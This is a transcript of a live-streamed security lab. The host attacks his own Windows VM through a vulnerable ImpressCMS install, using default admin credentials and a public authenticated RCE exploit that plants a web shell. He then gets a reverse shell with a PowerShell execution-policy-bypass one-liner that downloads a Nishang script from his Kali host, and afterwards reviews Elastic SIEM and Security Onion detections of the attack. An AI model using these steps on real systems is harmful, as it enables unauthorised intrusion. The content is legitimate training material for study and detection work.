What's going on, everybody? Welcome back to IT Security Labs. And tonight I'm very excited to be talking about endpoint security. And as always, we have a machine that we're going to be attacking, and we're also going to be detecting. And today I introduced a new concept of endpoint security, which, as you can see here, this is going to be just talking about how do you protect computers on your environment. All my live streams are usually showing you how to detect on the network as data is flowing. But today we have a new one. We will be looking at how do you protect devices like endpoints. I'm more interested in detection. So we're going to be detecting as a computer is attacked. Can you detect that? Thanks, BT. It's good to see you, brother. And I'm very excited because all these weeks, for almost a year now, I've shown you how to detect when data is flowing through a network. And today, we are actually going to the computer itself. Usually, you have a Windows Defender or some antivirus that will stop attacks. But how do we detect when a computer is attacked? When someone gets a reverse shell, can we tell from the computer's logs what happened? And that's exactly what we'll be doing today, showing you how to do that. In addition to that, we'll be attacking a machine that is OSCP-like. So we'll be showing you how to attack a machine that looks like ones that I faced when I was going for the OSCP. And I'll show you some tips and tricks on how to especially get a reverse shell in Windows. Getting a reverse shell in Windows was by far the hardest compared to Linux. So I'm hoping that you learn how to interact with Windows, get a reverse shell after you get a web shell, because if you don't know how to do that, you'll be very frustrated and spend hours wondering what's happening. So there is a little bit for everybody here, and it's good to see you, Rockstar. Thanks for joining, man. All right, so before we even do anything, let me show you what this should look like, right? We are detecting here. Let me move myself a little bit. We are actually detecting right here. We have one host. I have my machine that I made. It's called Impressme. I am sending all the logs from Windows to a security events and log manager. And this is a SIEM solution, and this is actually the Elastic Siem. You can sign up for it for free. Online, just go to the internet, type Elastic Siem. They'll give you a 14-day trial, no credit card needed. And then you can start sending events there, and you see what I'm looking at here. So what I'm doing is I'm sending Windows events there, and if anything fires, it should let me know. You should be able to see some alerts. Let me see in here. So if something funny is happening, you will be able to see, and the alerts will tell you. So here is an alert that we'll be generating today. I will show you what we'll be doing, but here it says web shell detection, script process, child process. We can talk about how you can do this, but down here you see that someone ran the command. Let's choose a different one that actually looks interesting. It should say hi. If you scroll down here, there, someone ran PowerShell and tried to get a reverse shell on this system. This is the Windows computer telling us, hey, someone ran this and this is the alert that fired. So I will show you how to generate this alert here and explain what this PowerShell command is doing. So you know not only how to get into a Windows computer, but what it looks like when the good guys are detecting on the other side. And I think this is the coolest material that I've seen, and I even get excited just talking about it. So I don't like to talk too much. Let's go ahead and attack our machine. And remember, we are doing this detection. And as part of the defense in-depth model, which says you need to put multiple layers of security, we have this on the host, but it doesn't mean that we stopped detecting on the network. We're still detecting on the network. But today, our focus will be host-based detection. All right. So let's go to our Kali Linux here and start our scans. I need you to sign in. What's up, William? It's good to see you, brother. You know, there's so many people who are regulars here, and it's always exciting to see the same people showing up again and again. Okay. I need to pay attention to my caps here. All right, so my host is located on 192.168.38.138. I already ran an nmap scan. But if you go to the exam or if you're practicing for the OSCP or even in the real world, you don't just run single nmap scans like this, right? This is SVSC, service version, and things like that. For me, going for the OSCP, even in the labs, the most important thing for me was running auto recon. So I'll show you what that looks like here, because I would like to run auto recon right away. If you run auto recon, let's go to temp. Yeah, let's run it in here. Auto recon will do all the enumeration for you on 192.168.38.138. Auto recon will do all the enumeration and give you a folder with all the results. This was very, very helpful for me because I just did this on all the 4 hosts and I didn't have to worry about anything once the exam started or once I was doing the labs. So you might want to take a look at auto recon here because it's a really good tool. But for our purposes here, we don't need all the scans that auto recon does. So we'll stick with nmap. Here is where the methodology matters. Yeah, it's good to see you, Stingray. The methodology here is, I get port 21. What am I thinking right away? Is anonymous login open? Right now, I don't see anything about anonymous, but this FTP server is actually talking. It's telling me that there is a version here. So what do? To make sure that everything is working, you copy that, you go here, you do a search exploit. Is there something I can exploit on that version of FTP? Right away, you will notice, oh, we have actually a few things. What I'm more interested in when I get results from all search exploit or the internet, I'm looking for remote code execution. That's my favorite thing. That's the easiest one. Buffer overflow, that's the last thing that I would do, especially with exploits. Denial of service, of course, we don't want a denial of service. So on that version, I see a remote code execution here. Interesting enough. But this is interesting. Oh, this is all Apache. No, I wanted FTP, FileZilla. So all this does not matter for me. But what I was saying still matters. You're still looking for remote code execution. Right now, we just got a bunch of noise here. Let's go back to our results. Maybe this. Search exploit is a local database for exploit.db. So if it doesn't give you results, it doesn't mean there is no exploit for this thing. I know there is I think, denial of service or buffer overflow for this one. Okay. Let's remove FileZilla and just that. All right. So there isn't much going on for that FTP. You can keep looking. The other thing is go to the internet and plug this whole thing in. Google. Let's actually do that. And as you can see, here is a buffer overflow for the exact version of FTP that we're running. So it's worth going to check this exploit here. And we like Python exploits because I like Python because I can read Python. I don't know what others can read, but here is an exploit. This is a buffer overflow for that version of FTP. So if you're interested, you can come and spend some time on this one. You'll probably try it and it doesn't work. This was not what I wanted, but there is that. This might be a rabbit hole for you. And some people say, well, how do I know how to avoid rabbit holes in the exam? This might be one of those where you see some version, some service that is running. It is an exploit. It looks promising. Here's a POC. What I suggest is run this quickly. If it doesn't work, don't get hung up on this. You need to move on. And that's what I'm going to do. I'm not going to even try that because I know that that's not how I designed the machine. I designed the machine. So This you need to investigate and try to run it. But if it doesn't work, I would say about 30 minutes tops, you need to move on, because sometimes there are services that are vulnerable that are not the intended way to break in. So 30 minutes tops, and you should be able to move on. So you see port 80. Here I have a little tip for people who, especially if they're interested in the OSCP. I encourage you at one point in your life, install a web server in Windows. Install an Apache web server, XAMPP web server. Install an ISS server. Become familiar with where those different types of servers keep files on the file system. I think having that knowledge for me really helped me like a ton. When I was in the exam, knowing where and how websites are installed in Windows really helps. So if you're trying to like scan systems and you have no idea how Windows lays out the file structure for websites, you're just doing a bunch of guesswork. So install the website, go through the process, you will learn a lot. Then when you're attacking, you're like, okay, I know exactly how the file structure works. And that will really help you. So if you are going for the OSCP, I wouldn't go there without even having installed a website on Windows at all in your life. I think that's a disservice to yourself. Anyway, here is another one that is running, port 80. So far, let's assume I enumerated this. I wasted 30 minutes on this exploit. It didn't work. So I'm moving on. That's a very important OSCP mentality. It didn't work, moving on. Keep it in your back of your head. If you enumerate everything and you don't find anything, then you can always come back. But this didn't work on the first try. Maybe there's something else. So I'm going to interrogate 80. Right away, I see that this was generated by this version of Apache. These ones usually are kind of useless. Like trying to go and find, oh, is there an exploit for XSL this or PHP? I mean, you can, but to be honest, nobody's going to, well, the websites don't usually come in a way where you abuse OpenSSL like that. I mean, it's possible, but for this CTF stuff that we do, that's not where the money is at. The money is actually on the actual website. So right now it says it was requested resource was http impressme.local, then impress CMS. CMS, we like CMS. CMSs are always vulnerable. So if you see a CMS running, chances are that's where the money is going to be at. So I would focus more on any website. The CMS is a good candidate for exploitation. So right away, I see that there is a name on this website. What do? You go to your local, to your host, and add that entry. So here's what I did. I came in here, add 192.168.138, add the name that you saw, impressme.local. And I also, since it's a .local, I also add Impressme, because .local means that that's just the domain. If you do try hack me, you know that this is something you do a lot, or even hack the box. So we add our entry in here, and that's good. Now we just need to visit the site. So first you'd come and do 192.168.38.138. You just want to see the site in its raw format, okay? Before I access the actual one, the other one. When you're faced with a website, here's what you do. You start looking around. This is a simple one. This is not like a blog or anything. It says Impress CMS. If it's a CMS, you want to go and either find the source code for this thing so you can read the source code, or you can just read around. The first thing that you want is, what is the version of this thing? Most of them will be in plain sight, like right in front of you. It will be like Impress CMS, and here's a version. Then you are armed with the name and the version. What do? You go to the internet, you find out, is there an exploit for this thing and this version? Right away, that's part of your methodology. So right now, if you look here, it does say, I don't know if you can see I'm highlighting here. Powered by Impressme 1.42. As an attacker, this is gold right here. Why am I saying this is gold? If you know it's a CMS and there's a version, all you need to do is now go to the internet and search for that. Or actually, let's try. You start with SageExploit. SageExploit doesn't always work though. I like SageExploit because it saves me from downloading things, but sometimes this happens. No results. This does not mean there is no exploit for this thing. Don't stop here. Take that again. Ask our good friend Google, do you have an exploit for this thing? And you type the word exploit after that. Right away, the internet tells us there is remote code execution. And you know me, I am a big fan of remote code execution. If I see RCE, that's the easiest exploit to get. You always want remote code execution. Even if it's authenticated or not, we'll find out here in a second. So here's the exact version that we have. It says remote code execution, but we have a problem. We have a big problem. It says authenticated here. This is what they say for the OSCP, that they like people who think fast, who think on their feet, and who can also adapt. Or just because it's authenticated doesn't mean it's a big problem. Let's try to understand what this thing is doing, because if you don't know what this thing is doing, you're going to realize very quickly you won't be able to run it. So let's try our best to oversimplify this, a lot of this code here, right? Here's an example of how we run it. So we run using Python 3. We name it exploit.py. So we need to save this code here and save it as exploit.py. It wants the URL of our CMS, -L, then it needs an admin, and P, admin123. This is an example, right? So right away, I know I need credentials. Without credentials, this is going to be useless for me. So what do? We go and find out. If you find out that you need credentials, first thing is you need to, if you have anonymous login here, sign into the FTP, see if there are credentials hidden in there. Are there any backups in this thing, in the FTP? When I created this machine, I thought of putting credentials in this FTP and saving them somewhere so that you can find them in a backup file. But I thought that would be too easy. I wanted someone to actually think like an attacker. But if you see FTP open, that's a good location for credentials in there. Can you upload things in FTP? But since we can't, we're only stuck with this thing here. There is a username and password page here. What do you do as an attacker? You are faced with a page that is asking for a username and password. I'll tell you what you do. You start stuffing credentials. Can you please, since this is live, can someone please tell me what I can start plugging into the username and password right away? It's just generic test without even brute forcing this thing. I'm curious. Please let me know in the comment section. What should I put as a username and password? What are the things that administrators who are lazy would put here as part of a test? Or what would you do to try? I'll tell you the first thing that you can try is try to go and see if there are default credentials for Impress CMS. So what do? You go to your Google. Right. I'm seeing some credentials are coming. Admin. Or try those. All right. So we don't see default credentials. You go to the installation guide. Does this thing ask someone to change the credentials? Here's the install steps that someone takes. This is interesting, right? You come in here, you educate yourself. Does the administrator set a password here? It tells you it's using MySQL and all that stuff. So I got default creds here. Admin password. Let's go and try those credentials. Admin. All right, you see this redirected here. If we didn't add it to our Etsy host, it would not have worked. So admin didn't work. Stingray say admin password. And we're in. This is a fundamental thing that I think a lot of people who overthink things, they don't even try. They don't even try admin password, admin no password. Especially if you see like MySQL, sometimes it doesn't have a password. So what is the biggest takeaway here? If your page is faced with a login page, don't be a fool. Try the default credentials. Try at least 5 times. Hey, admin password, admin, capital letter admin, lowercase, capital P for password. You owe it to yourself to try these silly credentials. You will be so mad to leave an exam because you couldn't sign in because you didn't try the default credentials. Don't brute force, because brute force is not encouraged, but try the default credentials or look them up or just try the common ones. In this case, admin password let us in. And that's one takeaway that I wanted us to take from this. Now that we're in, we see that we have an administrative menu. We start poking, right? What can we do? There's a lot of things here. There's a content, there's a profile. All right, we see again, our version is still there. So now that we have credentials, we can go back to our exploit. All right, I have credentials. But before I run this, I owe it to myself to at least have an idea. I don't have to understand every single line in here, but the first thing that I need to understand is what is, especially if it's Python, what are we importing? Because if I don't have any of these, it's going to complain about them. I know that my computer has all these because I've used these requests before. But if you're missing any of these Python modules, you might need to load them. That's not the end of the world. You run this script, it will complain, hey, we're missing argparse. Go to Google and say, hey, how do I install argparse in Kali Linux or Ubuntu? It will tell you. Once you import, that's the first part, right? Then here's some stuff that is doing. I'm looking for how is it interacting with my website. It's checking whether it's HTTP or HTTPS. In this case, that's good because we only have HTTP. And if it doesn't find the IP address, it say address not reachable. So we know that's what we're going to see. Otherwise, we'll get a response. But look what it's doing. There's a /evo.php. What in the world is this evo.php and why is this important for us? Okay. And we have a response code of 200. So what is it going to do? It's going to create a file called evo.php on this victim system. Okay, so we know that it's using the user agent of Mozilla Windows NT. That's fine. And let's see if what is the content of this file that it's putting out there, because that's interesting. All right, I see right here. Here's the name of the evo.php, but right away I also noticed that it's putting it one directory before the installation directory. This is interesting because if you don't know that it's putting it in the dot, which means it's not in the installation of our CMS, but one before, that's also going to be interesting. Then I think I saw the content. Oh, where was that? I thought it was in plain text somewhere here, not encoded. Because this is the data that we're putting in there, and we're writing it to an evo.php file. All right. It's unfortunate because I wanted to see the actual data without encoding or anything like that. All right, so let's go and run this script here and see if it works for us using this syntax. So download this, wget, copy this and paste it, whatever you do to download it. It doesn't matter. For me, I'm going to go to here. I have this exploit.py. It's the same exploit that we were looking at. Nothing here was changed. It's just the same exact exploit. So let's run it. I'll copy the usage that they gave me, but give it my credentials. All right. What is the URL? I want it to be exactly this one, because that's the one that's directing us there. And you can try a couple times here. It will tell you if it fails. All right. All right. So now we are running it. Okay. So it says file exists. If the file didn't exist, it will just run, and then it will give you this. Let's type, where am I? Let's see if this is going to work or not. So we just ran it, and it says, where am I? NT authority. So this will be a classic 10-point machine where you get an exploit. It's a one exploit. You need to work a little bit to get to it, but within 30 minutes, you might be able to get it. So right away, it says, who am I? And we are in as NT authority. And actually, this is what happens with the 10-point machine. If this was a 25-point machine, this would be like, I'm in as, say, Mickey Mouse or whatever. But this is not the end, right? This is not the Windows shell that we are after. We want the real Windows shell. So assuming we did not get it this way, let me show you something very valuable that you might want. If it failed this way, what you would do is sometimes, and this counts for when you upload a shell directly to the system. Remember, our exploit is putting this shell in a directory, right? And it's called evo.php. This one. Let's go and track it down and run these commands from the site itself. And this is something that you might actually face a lot, where you're able to upload a PHP or a Python or whatever shell. So we have evo.php on our site. And this is gold for anyone who is interested in the PWK. So you type evo, actually, this is what if you didn't know where it's putting the PHP on the directory, right? But you know it's putting it somewhere on our website, but you don't know where, and you have remote code execution on the PHP shell. Then you can do cmd equals to, say, who am I? It will fail. You will see this. And some people will start sweating. It's not working. What's going on here? I know I put my reverse shell on the site and it's not working. What is going on here? If you know you put a reverse shell there and it's not working, even if you are not thinking, start going down the tree. Remove the directory one at a time until maybe it's here, right? So even if you didn't know, a real attacker will not just give up when they run it once. They will be like, oh, did it drop in the other directory? Maybe it's in the root directory of the website. That's why I said maybe knowing how to install these things might be helpful. And right here, I would like to show you something that you will need for any type of engagement that involves a web application, right? Where you have remote code execution from a website. How do we get a terminal on this system as NT authority from here? Can we just get a reverse shell from here? Because if usually you notice that when you go for the PWK, they say this is not an acceptable way of owning a system. You can get here, submit a screenshot. They will not accept this as a proof that you actually owned the system. They want you to have a terminal on the system. So a lot of people get here, you are not yet on the system. How do we get here and end up on a terminal running commands directly on the system? That's what we want. So this is not acceptable. I don't like this because this is not Windows terminal either. I would like to actually get a real terminal. So we can run from here, but for the most part, this is more valuable for everybody who's watching here. I would like to introduce you to, I call this one Nishag. Is it Nishang? Nishang. This was by far my favorite tool for getting reverse shells. So if you want to interact with Windows and get reverse shell, try to have a bunch of options, and Nishang is one of them. In the shells directory here, there is a PowerShell, Invoke Partial Tcp 1. This right here is the easiest way. So if you are stuck on a web shell like this one and you need to really get on the system, by far, start with this. You will thank me later. But you can just run this by itself, right? You need to edit this. So let's go to my directory. Where was I? So I have the Invoke Partial Tcp. This is how you can get a reverse shell very easily and fast. We should be able to see what it's doing, right? This one will run PowerShell commands to get you a reverse shell back to your Kali Linux. And here's an example. You can run it in Invoke PowerShell TCP reverse, IP address, then the IP address of your machine, then the port 444. But I will let you in on a little secret that actually makes things very interesting. If you have a web shell, if you can run remote commands on a web shell, like I am doing right now, you should be able to send this one using PowerShell to the victim and get a reverse shell without running two commands. And I think that's really, really, really fun. So let's copy this line here. Go all the way to the bottom of this thing. I'd like you to paste that line and put your information. So let's insert. Okay. So you copy the example line. Then I saved this exact thing as shell.ps1 because I didn't want you to see me struggle with copying and pasting here. All right, so it's the same exact thing. The only thing you need to do is copy the example here and paste it all the way at the bottom. This invoke TCP reverse IP address, then put your IP address here. The port, in this case, I'm using 444, but but here's a big problem with PWK. You probably have seen this in the labs. These ports do not fly. These ports here do not fly, right? If you use some generic ports like this, they are not going to work most of the time. And this is what most people say, well, the exam was really hard. I don't know why, but I tried so many times. Reverse shell didn't work. Use the ports that are open on the system. I read this on somebody who took the OSCP. If you do an mmap scan and you see a bunch of results and the system has port 3200 open or some random port or 21 open, catch your shells on ports that are open on the system. They tend to work. 444 won't work. So that's something that I think most people are going to come back and say, dude, you were right. because I found out running 444 doesn't work. But for this case here, I like to catch it on 444. But if you are going for PWK, don't use these ports. Use ports that are open on the system. You thank me later. All right. So once you add this line here, now you have your shell. We would like to run that command using the web interface. This is a skill that you need to have mastered by now if you have an exam in a week or so. We would like to run that PowerShell using this browser. Two things that should come to mind are PowerShell execution policy on the system, if it's a Windows machine, is set to not run. So if you come here and start running PowerShell commands, the system will say, get the hell out of here. You cannot run commands because PowerShell execution policy does not allow you to. How do you bypass that? You tell it to bypass. So here in my file transfer cheat sheet, I have the command that we're going to use here. And I'll break it down for us before running it on the system. So first, if you want to transfer files to the system, there are many ways. Here are a few of my Windows ways that I found. And I even have, cheat sheet. This one here, this one is what works for Nisheg for me. It's a one-liner. And what happens is when you run that PowerShell, it will run the line that is at the end. It will give me reverse shell right away. I don't want to do these things where I run setutil to deliver netcat. Then another command to run netcat, the netcat command. 2 steps, too many opportunities for error. I just want one. And Nishang is the way to go. I'm telling you, Nishang for Windows is gold. So let's break this one down. PowerShell exec, right? We're executing PowerShell. Bypass. This will bypass the PowerShell execution policy. If you don't have the bypass option, you will run this command until the end of the day. It will not work. So PowerShell -exec bypass -c new object. Let me paste this in the chat in case somebody's writing notes. You need this for your notes for testing when you're practicing. So what is it doing? It's downloading a string from 192.168.38.146 and it's named shell1.ps1. This is my Kali Linux IP address. So what do I need to do? I need to host an HTTP server on my Kali Linux in the same directory where shell1 exists, and all of a sudden reverse shell will come if I listen on port 444. So let's go and start a reverse shell here. All right, I just wanted to remind you, this is what is going to get me a reverse shell, this line here. This line will run this file and give me a reverse shell. So you're doing a 2-in-1. You're getting this file to the victim. You're invoking this. As soon as this file is downloaded to the system, then you invoke 2-in-1, 2 birds in one. If you didn't want to do this, I have another one. Oh, I didn't put it here. Yeah, this right here is what's giving you a reverse shell. It's going to run this file that you put there and run it and invoke reverse on 444. So we need an HTTP server. My go-to Python 3 -m http.server on 80. Again, if you are in the PWK, sometimes transferring files will fail if you host your files on port 80. You need to try and maybe host your file on a port that is open on the system. Again, the ports game that they play. I don't get it. I don't like it. But if you are having a hard time getting your files to transfer, open a port that they have open on their system to host your file, your HTTP server. That will work or might not work. So that's another hint that you need to keep in mind. Because you hosted yours on port 80 and it didn't work, doesn't mean it doesn't work. Use available ports that they open. I don't get the logic, but if anybody knows, let me know in the comments. All right, so we are hosting here. We are ready to run this command, but we also need a listener. File new. sudo su. I never used the multi-handler, even though it's easier. I just use netcat. It gives me stable connections almost every time. So netcat minus lvnp 444. So all that's left is for me to run this. Remember, I'm bypassing PowerShell execution policy here using this bypass. So we know that the commands run. All we need to do is move who am I to our PowerShell. What should happen is I should come here. I should have downloaded something here. I should see a 200 on shell 1. I should also see a reverse shell. So moment of truth right here. If it hangs like this, that's good news. If it fails right away, you know you have a problem. All right, there we go. We're in. What happened here? We saw a get and 200. What I just showed you in the last 3 minutes is very, very important. That's one of the many ways you should have mastered on how to execute a reverse shell. And I executed a reverse shell using one line. I didn't put netcat there, then try to run netcat commands. There's so many mistakes that happen. Nisheng is the way to go. I highly encourage you to play with Nisheng reverse shell. The first day I saw it, I was like, that is the best way to get a reverse shell in Windows, because Windows gave me a lot of headaches getting reverse shell. So there you have it. Now we're in the system. We can do it here. See what's happening. This is where evo.php that we're running. This is where the website is installed. Here, Impressme. And if you're curious how I made this machine, I just changed the index.php to point to this right here, because it goes to the dashboard by default. So sometimes you will see the dashboard. You need to run GoBuster. If you run GoBuster, you will still see Impressme showing up. So this is, again, very, very good stuff. So let's go ahead and get our flag and look at our detection. Because during this whole time, we're actually detecting. When we go to our host-based detection, we should see the reverse shell. We should see all these attempts to run web servers. Any detection engine on these systems should be able to tell me. So let's go to users. I just happen to know that there's Mickey here. And Windows doesn't care about caps. I left you the goodies that I used for installing this system, just in case you wanted to install it yourself. You can download this in our community. You can download this machine that I'm attacking here. I made it and I shared with people in our YouTube community page. You can find that. Type all right, so here's the flag. We got the flag. Then you need to decode this, of course, because I didn't want it to end here. So you got the flag. Let's decode this. It's a base 64. If you don't know what base 64 looks like, these 2 dashes here should be a giveaway. So let's decode this flag and find out what I said in this message, because I said something interesting. So let's echo everything and pipe it to base 64 minus D to decode it. So remember, the more ports you see, the faster you have to enumerate to escape rabbit holes. Rabbit holes are everywhere. Avoid tunnel vision. That's what I was trying to say here. You are going to be bombarded with a ton of ports. And to me, that was the most annoying thing, because I'm used to these CTFs where I see 20 ports. I saw a ton of ports, a lot of ports, and it was annoying to see so many websites running on a system. But if you can enumerate, give yourself some time, you should be good. All right, so now that we got our shell, I'll be able to answer any questions that you might have here. But remember, we're doing intrusion detection on the host. This is on the actual host. This is not network-based. This is host-based intrusion detection. So I just refreshed from the last 1 hour. I'm seeing a lot of things here. Let me change by severity. Here is a web shell one that I can look at. Let me move myself out of the way. This should be a good introduction to host-based intrusion detection. So we should be able to see the commands that we ran. This is looking at Windows logs. So this one, web shell detection, script process, child process, web process. So Windows like to keep track of processes that are running. So if someone is running a process, if a process is started by the website, Windows like to complain about it. And you know why, you see why here. This one just ran the command line, who am I? Remember when I signed in and I typed who am I? Well, who am I is a crime to type on Windows. If you type who am I, you're going to be caught because they know that somebody got in a system and they wanted to know who they are. So maybe you don't want to do this. If you are doing an engagement, let's check the other one. I'm just picking on the high ones here. This one is the same, who am I? Maybe I need to narrow this down further. Let's go on these ones. Apply the filter. Okay, there we go. So that I'm looking for the PowerShell commands that I was running. Did I pick the wrong one? I picked the who am I one filter. Let's get out of that. I know I have a lot of these alerts here. Let's try this one. Apply the filter. This is called the Elastic Siem or security events and log management. This is not helpful. It's giving me the same stuff. This shows the need for us to know how to search this thing. Oh, here's a net command, a system. This one was ran by system. Let's open the middle one. Did I just run a bunch of who am I's the whole time? All right, we just keep looking here through all of them. Maybe we'll find something. Okay, this one. All right, I'm going to change my time here just in case this thing is not going to show me what I want. I'll show you what I saw earlier in here. Would this one work? Okay, this was the ID command. So we're getting somewhere. We should see when we ran the PowerShell commands. Oh, here is a setutil. All right, so here's a setutil command that I ran earlier. So you can tell that in the process arguments here, it will tell you what commands the attacker actually ran. And this is just, so if you're curious, like, okay, how does Windows detect all this stuff here? You can also come and check the rules that were created. And I think by far, this is you now taking your learning experience from this person who's just excited about hacking things to someone who actually wants to know, like, okay, if I can attack things, how are they finding out what's happening here? In this case, they are looking for the process name setutil.exe. Why? Because they know. People like me like to use setutil to get there. So that's why maybe using setutil might not be the best way here. Maybe using FTP might be the way to go. Let me see if I can find one more. We can go to our host-based intrusion, our network intrusion detection, and also cross-reference this, what this system saw. But you see that it's calls it web shell. So if the web shell starts anything, any other processes on the system, it will be able to tell. So let's go here. Here's another setutil. And here's another whoami.exe. Let's check this one out again. Looks like the same one. All right, I'm going to pick one last one. Web shell detection. All right, you can tell this person, this was me. This was me when I was trying to see, okay, which ways do you get? By the way, all these things that I'm showing you here are alternative ways on how you can get files to the Windows system. I was running wget commands, recursive, no parent, getting shell1.ps1 on the victim. This will just drop the shell there. You need to execute the shell after. So you can run wget, you can run setutil, or you can just run what I showed you, which is the most effective way. So I tried all of them, and here is one of them. Of course, this succeeded. So now, as a defender, if you see this, you know, oh, they actually downloaded a file called shell.ps1, most likely in the directory where the website is running, or one below it in this case. So you need to go and find out if that's actually what happened. You can cross-reference this by just going to your network-based intrusion detection system. We can search for it here. This is now data from the network. You can search for shell1 in here, and I'm pretty sure you'll find it because our intrusion detection system should have seen it. This is now security onion. So we're pivoting, being able to tell what happened here, and you should be able to search. Let's see if we can actually. It's shell.ps1. At least there should be some reference to it. And here it is. In fact, this is the one that we ran. So this is just my way. This is why I like network-based intrusion detection better than the endpoint security, because this talks more. If the data is not encrypted, this is loud. This is the exact command that I ran here. The get evil power, even with the exact policy here, bypass here. And it's right there. So this is showing you the attack happened. They ran a PowerShell command. Now your job is find out what was in that PowerShell command. And you will notice that it was the initiating PowerShell command that gave us a reverse shell. So I hope you're finding this valuable. But if you're going for any PWK or any other test, really, Windows is the hardest. And I plan on creating more of these Windows machines so we can keep playing. And I get really excited. It's fun stuff. Even though I've passed the OSCP, maybe I'll go for the OSCE because this stuff is really fun. I just can't have enough of it. If you have any questions, now is the time. Thank you, everybody, for the feedback. I really appreciate it. Thanks, Ricardo. It was a very fun experience. It was a lot of adrenaline, but I think it was well worth it. If you're interested in playing around with this, let me show you. If you have any questions, please ask now while I show you around here. Here's the alerts section, but you also have the rules. You can come in here and play. So if you're like, okay, how do we detect? How does detection work? Here are the rules that I loaded in here. These are the rules that we're firing when I was showing you. And you can see here examples. You can also create your own rules in here. I've actually created in the past. I'll just execute my commands and then create my own rules. But these rules, they are looking for people to make rules. So if you're interested, play with this, generate some rules and share them open source the rules. They're really great. Then, of course, you get the network view if you were interested to see, like, okay, what is the state of my network in this case? Let's see. Someone saying, can I start at 8 or 9 p.m. Eastern? 9 p.m. Central Standard seems to work. That's when my child has gone to bed. I don't want to miss my kid doing these things. I want to make sure that I do this after my family goes to bed. So as you can see here, you can see more information than I showed you, of course. But it's a very, very interesting solution. Did you install an agent on the Windows machine to collect the logs to the Elastic Siem? Yes. So all you do here is you sign up for this for free. On the Elastic Cloud, you get 14 days. Then you can go to down here. I think you can go to, is it endpoints? So here's my agent that I installed. It will show you. Yeah, you install an agent. There's a way to install an agent from the interface in here. Let me show you actually. It's not under security. It's under host. All right, it's somewhere there. If you're interested, I can make a video and show you. But once you install this and enable everything, you can just download the agent on your Windows machine and then run a command, and it will connect here by default. And then you can choose which logs you want. In this case, I chose Windows logs because that's what I wanted to see. But you can choose to all kinds of logs, including Apache system logs. For example, here is more things that the Siem will show you. This one was saying, how do you get ELK to send to more than one PC? You just install the agents on every PC. You need an agent on every PC. It will send there. And here's more information that you can see. If I were attacking here, this is what I'll see. Let's see. You can get application-specific logs. Here I was trying to get Apache logs. I didn't get them. So you can get a lot of logs in there for endpoint security monitoring. It's really fun stuff. You can see if someone is brute forcing your system, this here will show you right away. The events here are kind of interesting. The events are loud, of course. Oh, I need to add my contact info in the channel. Yeah, I will add that. Thanks for letting me know about that one. Most of this, what the system is connecting to is probably Microsoft servers. You can see these public IPs that show up here. All right, remember to like and subscribe. If you like this video, YouTube will push it to more people. I think a lot of people would like to see this type of content. There is a lot of value in what we're doing, and it's a lot of fun. So I hope you can bring your friends, let them know that they can come here and learn, and also try to exploit these machines that I create. They do take some time to create, so if you are interested, especially in the OSCP, try to get them correct. The one that I created tonight, I think 2 people responded to me on Twitter saying they got it to work. So yeah, thanks BT. There is an email there that I check for emails to me. How are we doing on time? Oh, perfect. Thanks, William. Thanks, everybody. All right. So thank you for being here. If you're interested in this type of content, please subscribe. I'll be making more videos during the week as well, and dropping maybe one video on Wednesdays. So check the channel on Wednesday mornings or afternoon. I will be dropping videos that might be very helpful for you. So thanks for being here. Is it possible to have these smaller files? I tried to zip the files, I'll try to maybe gzip them, but Windows, that's why Windows is not popular. Is Windows files are big. They're like 6 gigs or 7 gigs. I can share those files, but maybe there's a way. If you're a member on the channel, I can try to host these machines for you. Just let me know. I'll put it in Azure for you and start it, then give you a public IP. Then you can just attack it without installing it. So if you're a channel member, let me know if you're interested in these machines. When I create them, I'll just put them in Azure. Then I'll give people individual public IPs. Then you attack them, and you'll be the only one with that machine. I can do that as well. In fact, I've been thinking about that for a while. All right. Oh, I also forgot that you can interact with the logs from the Elastic Siem directly, like the raw logs, which is where most of the value comes in. So if you're interested in that, please check it out. Otherwise, thank you everybody for being here. I will see you next Sunday for another live stream. Appreciate you being here.